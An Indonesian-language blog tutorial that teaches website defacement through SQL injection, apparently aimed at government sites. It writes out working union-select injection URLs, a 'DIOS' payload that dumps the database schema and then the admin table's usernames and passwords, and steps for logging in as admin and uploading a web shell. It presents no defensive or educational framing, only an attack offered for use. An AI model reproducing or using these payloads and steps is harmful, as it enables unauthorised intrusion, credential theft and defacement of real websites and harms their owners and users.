Tutorial Deface Metode SQL injection (With Dios)

Ohaiyo minna-san,
Jadi gini gw mau buat tutorial deface Metode SQL injection with DIOS, apa itu SQL injection? SQL injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi, dan apa itu DIOS? DIOS adalah sungkatan dari Dump In One Shot, Maksudnya adalah memunculkan semua isi Database dalah satu query saja. Dah paham kan?, oke lanjut ke Tutorialnya.

Bahan:
  1. Dork SQL injection: Touchme_Senpai:*
  2. Shell Backdoor: Mpshh..Ahh:*
Tutorial:
Dorking seperti biasa dengan dork yang sudah gw sediain di atas atau kalian bisa kembangin lagi:)
Setelah Nemu targetnya kalian ceck webnya vuln SQL atau tidak, cara mengetahui webnya vuln atau tidak cukup tambahin tanda(') di belakang nomornya, contoh: site.go.id/index.php?id=21'.
Kalau  muncul tulisan "You have error by sql syntax ....." atau tulisan/gambar jadi menghilang kemungkinan besar web tersebut vuln, perhatikan gambar berikut.
Nah, kalau error seperti gambar diatas, sekarang tinggal kita cari tau jumlah table yang ada pada databasenya,caranya cukup mudah sih tinggal nebak aja, Caranya tambahkan query +order+by+ serta jumlah tabel yang mau di cek. Contoh:

https://site.go.id/index.php?id=21'+order+by+1--+ -> NORMAL
https://site.go.id/index.php?id=21'+order+by+2--+ -> NORMAL
https://site.go.id/index.php?id=21'+order+by+3--+ -> NORMAL
https://site.go.id/index.php?id=21'+order+by+4--+ -> NORMAL
https://site.go.id/index.php?id=21'+order+by+5--+ -> NORMAL
https://site.go.id/index.php?id=21'+order+by+6--+ -> NORMAL
https://site.go.id/index.php?id=21'+order+by+7--+ -> NORMAL
https://site.go.id/index.php?id=21'+order+by+8--+ -> NORMAL
https://site.go.id/index.php?id=21'+order+by+9--+ -> NORMAL
https://site.go.id/index.php?id=21'+order+by+10--+ -> NORMAL
https://site.go.id/index.php?id=21'+order+by+11--+ -> ERROR

Nahh sekarang kita sudah tau berapa jumlah tablenya yaitu 10,sekarang kita tinggal cari table yang vuln, caranya tinggal masukan query +union+select+ dan tambahin jumlah table dan juga tambahin karakter --+ di ujung tablenya dan jangan lupa tambahin titik(.) di depan angkanya.
Contoh:
https://site.go.id/index.php?id=.21'+union+select+1,2,3,4,5,6,7,8,9,10--+
Pada gambar diatas muncul bberapa nomor yang vuln yaitu angka 2,8 dan angka 7.selanjutnya kalian pilih angka yang ingin kalian masukan dios, Disini gw pilih angka 7, lalu kalian masukan diosnya:
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

Contoh:
 https://site.go.id/index.php?id=.21'+union+select+1,2,3,4,5,6,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),8,9,10--+
Nanti akan muncul table databasenya,lalu kalian cari data admin loginnya,lihat gambar berikut.

Disini table admin loginnya berada di:
tbl_admin,user_name
tbl_admin,user_password
Nahh setelah ketemu table adminnya, Tinggal kita cari tau isi dari table admin tersebut. Caranya?
https://site.go.id/index.php?id=.21'+union+select+1,2,3,4,5,6,(Select+export_set(5,@:=0,(select+count(*)from(tbl_admin)where@:=export_set(5,export_set(5,@,user_name,0x3c6c693e,2),user_password,0xa3a,2)),@,2)),8,9,10--+
Nahh pada gambar diatas udah nampak username dan passwordnya yaitu:admin,lalit@$$0, Kalau passwordnya masih berbentuk md5/sha1 dll. Kalian hash dulu disini:mpshh.
Setelah itu tinggal kita pergi ke halaman admin loginnya, dan login pakai username dan password yang udah kita cari tau tadi, dan bumm masuk ke halaman dashboard adminnya.
Kemudian kita tinggal cari tempat upload gambar,lalu upload lah shell kalian, jika berhasil icon gambar tersebut jadi error nah lalu salin gambar tersebut dan pastekan di tab baru dan bumm.. shell terupload gayn:)

Mudah bukan?,oke mungkin cukup sekian tutorial dari gw semoga bermanfaat.

Belum ada Komentar untuk "Tutorial Deface Metode SQL injection (With Dios)"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel